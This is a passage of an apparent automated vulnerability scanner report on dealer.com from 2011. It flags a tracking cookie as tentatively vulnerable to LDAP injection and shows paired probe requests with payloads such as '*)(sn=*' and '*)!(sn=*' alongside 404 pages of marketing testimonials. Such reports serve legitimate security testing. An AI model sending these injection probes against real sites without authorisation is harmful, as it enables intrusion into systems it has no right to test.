Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=c57a1dde651b3a70)(sn=*; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003110; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fproducts%2F%22%3Bi%3A3%3Bs%3A17%3A%22%2Fcompany%2Fcontact%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.54.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20260
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:21:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003319; expires=Mon, 16-Apr-2012 01:21:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http
...[SNIP]...

Request 2

GET /products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/search-engine-optimization/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=c57a1dde651b3a70)!(sn=*; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003110; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fproducts%2F%22%3Bi%3A3%3Bs%3A17%3A%22%2Fcompany%2Fcontact%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.54.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20438
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003319; expires=Mon, 16-Apr-2012 01:21:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>I really enjoy being able to go in and add a page, create the meta data for that page, and immediately have it show up. It has been tremendously helpful for us.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have more visitors on our site than we do cars that go by on the street. If that's not powerful, I don't know what is. Dealer.com knows how to sell cars on the Internet. </p>
   <cite>Dave Cook, President of the Norris Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO
...[SNIP]...
1.10. http://www.dealer.com/products/sales-analytics/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/sales-analytics/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/sales-analytics/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/sales-analytics/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./solutions/agencies/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./solutions/oem/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003126; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Fsales-analytics%2F%22%3Bi%3A1%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.57.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20170
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Dealer.com's CarFlix videos impressed me a lot because I don't have to go to more than one vendor for my video. </p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Everyday we are told about how great our site is and how easy it is to get information from. We recently started a billboard campaign called "Shop in Your Underwear at Stevebaldo.com" to capture the majority of customers already online doing &#8230;</p>
   <cite>Sheila K. Snyder, Steve Baldo Dealerships</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
...[SNIP]...

Request 2

GET /products/sales-analytics/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/sales-analytics/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)!(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./solutions/agencies/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./solutions/oem/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003126; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Fsales-analytics%2F%22%3Bi%3A1%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.57.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20305
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdo
...[SNIP]...
1.11. http://www.dealer.com/solutions/agencies/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/agencies/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /solutions/agencies/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/agencies/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003120; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.55.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20166
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The back-end tool is one of the simplest I've seen. It's like working with a Microsoft Office program. Everything is easily spelled out for you.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/inventory
...[SNIP]...

Request 2

GET /solutions/agencies/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/agencies/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)!(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003120; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.55.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20125
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="C
...[SNIP]...
1.12. http://www.dealer.com/solutions/oem/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/oem/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads 405dbe54cabfaef5)(sn=* and 405dbe54cabfaef5)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /solutions/oem/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/oem/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=405dbe54cabfaef5)(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003121; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.56.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19967
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Ranked #8 in the nation in April and #12 YTD (up from 16th last year), you and your team have been leading our progress.</p>
   <cite>Ken Girard, McGrath Acura of Westmont</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The back-end tool is one of the simplest I've seen. It's like working with a Microsoft Office program. Everything is easily spelled out for you.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
